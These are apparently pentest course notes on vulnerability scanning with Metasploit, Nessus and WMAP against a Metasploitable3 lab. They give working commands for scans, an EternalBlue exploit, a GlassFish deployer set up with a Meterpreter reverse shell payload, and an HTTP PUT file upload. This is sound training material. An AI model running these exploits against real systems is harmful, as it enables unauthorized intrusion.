1.2.2.3 Vulnerability Scanning

Previous1.2.2.2 Information Gathering & Enumeration Next1.2.2.4 Client-Side Attacks

1.2.2.3 Vulnerability Scanning

Vulnerability Scanning With MSF

MSF Auxiliary and exploit modules can be utilized to identify inherent vulnerabilities in services, O.S. and web apps.

Useful in the Exploitation phase of the pentest

🔬 lab environment will be used for the vulnerability scanning demonstration.

Metasploitable3 is a vulnerable virtual machine developed by Rapid7, intended to be used as a vulnerable target for testing exploits with Metasploit.

🔬 You can find my lab installation & configuration with Vagrant at , set up for educational purposes.

Kali Linux attacker machine must be configured with the same local network of the Metasploitable3 VMs.

Detect active hosts on the local network, from the Kali VM:sudo nmap -sn 192.168.31.0/24Nmap scan report for 192.168.31.139 # Linux targetNmap scan report for 192.168.31.140 # Windows2008 target

Run Metasploit:

service postgresql start && msfconsole -qdb_statussetg RHOSTS 192.168.31.140setg RHOST 192.168.31.140workspace -a VULN_SCAN_MS3

Service version is a key piece of information for the vulnerabilities scanning. Use the db_nmap command inside the MSF

db_nmap -sS -sV -O 192.168.31.140[*] Nmap: 21/tcp open ftp Microsoft ftpd[*] Nmap: 22/tcp open ssh OpenSSH 7.1 (protocol 2.0)[*] Nmap: 80/tcp open http Microsoft IIS httpd 7.5[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds[*] Nmap: 3306/tcp open mysql MySQL 5.5.20-log[*] Nmap: 3389/tcp open tcpwrapped[*] Nmap: 4848/tcp open ssl/http Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)[*] Nmap: 7676/tcp open java-message-service Java Message Service 301[*] Nmap: 8009/tcp open ajp13 Apache Jserv (Protocol v1.3)[*] Nmap: 8080/tcp open http Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)[*] Nmap: 8181/tcp open ssl/http Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)[*] Nmap: 8383/tcp open http Apache httpd[*] Nmap: 9200/tcp open wap-wsp?[*] Nmap: 49152/tcp open msrpc Microsoft Windows RPC[*] Nmap: 49153/tcp open msrpc Microsoft Windows RPC[*] Nmap: 49154/tcp open msrpc Microsoft Windows RPC[*] Nmap: 49155/tcp open msrpc Microsoft Windows RPC[...]db_nmaphostsservices

Manually search for a specific exploit
- Check if there are any exploits for a particular version of a service

search type:exploit name:iissearch type:exploit name:iissearch Sun GlassFish

Check if a module will work on the specific version of the service

use exploit/multi/http/glassfish_deployerinfo# Description:# This module logs in to a GlassFish Server (Open Source or# Commercial) using various methods (such as authentication bypass,# default credentials, or user-supplied login), and deploys a# malicious war file in order to get remote code execution. It has# been tested on Glassfish 2.x, 3.0, 4.0 and Sun Java System# Application Server 9.x. Newer GlassFish versions do not allow remote# access (Secure Admin) by default, but is required for exploitation.set payload windows/meterpreter/reverse_tcpoptions# check the LHOST, LPORT, APP_RPORT, RPORT, PAYLOAD options

searchsploit "Microsoft Windows SMB" | grep -e "Metasploit"

Back in msfconsole, check if the server is vulnerable to MS17-010

search eternalblueuse auxiliary/scanner/smb/smb_ms17_010runuse exploit/windows/smb/ms17_010_eternalblueoptions# always check Payload optionsrun

takes a look at the Metasploit database and provides a list of exploit modules to use for the already enumerated services

On a Kali terminal

wget https://raw.githubusercontent.com/hahwul/metasploit-autopwn/master/db_autopwn.rbsudo mv db_autopwn.rb /usr/share/metasploit-framework/plugins/

On msfconsole

load db_autopwndb_autopwn -p -t# Enumerates exploits for each of the open portsdb_autopwn -p -t -PI 445# Limit to only the 445 portdb_autopwn -p -t -PI 445

On msfconsole use the analyze command to auto analyze the contents of the MSFdb (hosts & services)

analyzeanalyzevulnsvulns

A vulnerability scan with Nessus result can be imported into the MSF for analysis and exploitation.
Nessus Essentials free version allows to scan up to 16 IPs.

Start Nessus Essentials on the Kali VM, login and create a New Basic Network Scan and run it.Wait for the scan conclusion and export the results with the Export/Nessus button.Nessus Essentials - Metasploitable3

Open the msfconsole terminal and import the Nessus results
- Check the information from the scan results with the hosts, services, vulns commands

workspace -a MS3_NESSUSdb_import /home/kali/Downloads/MS3_zph3t5.nessushostsservicesvulnsvulns -p 445search cve:2017 name:smbsearch MS12-020search cve:2019 name:rdpsearch cve:2015 name:ManageEnginesearch PHP CGI Argument Injection

🗒️ WMAP is a web application vulnerability scanner that allows to conduct and automate web server enumeration and scanning from within the Metasploit Framework.

Available as a fully integrated MSF plugin
Utilizes the in-built MSF auxiliary modules

ip -br -c a192.28.60.3# Target IPservice postgresql start && msfconsole -qdb_statussetg RHOSTS 192.28.60.3setg RHOST 192.28.60.3workspace -a WMAP_SCAN

Load WMAP extension within msfconsole

load wmapload wmap

Add WMAP site

wmap_sites -a 192.28.60.3

Specify the target URL

wmap_targets -t http://192.28.60.3wmap_sites -lwmap_targets -l

Show only the MSF modules that will be able to be run against target

wmap_run -t

Run the web app vulnerability scan
- this will run all enabled modules against the target web server

wmap_run -e

Analyze the results produced by WMAP.

wmap_run -twmap_run -e

List WMAP found vulnerabilities

wmap_vulns -l

Since the allowed methods are POST, OPTIONS, GET, HEAD, exploit the vulnerability with the use of auxiliary/scanner/http/http_put module to upload a file into the /data directory
- 📌 A reverse shell payload can be uploaded and run on the target.

use auxiliary/scanner/http/http_putoptionsset PATH /data/set FILEDATA "File uploaded"set FILENAME file.txtrunMetasploit - auxiliary/scanner/http/http_put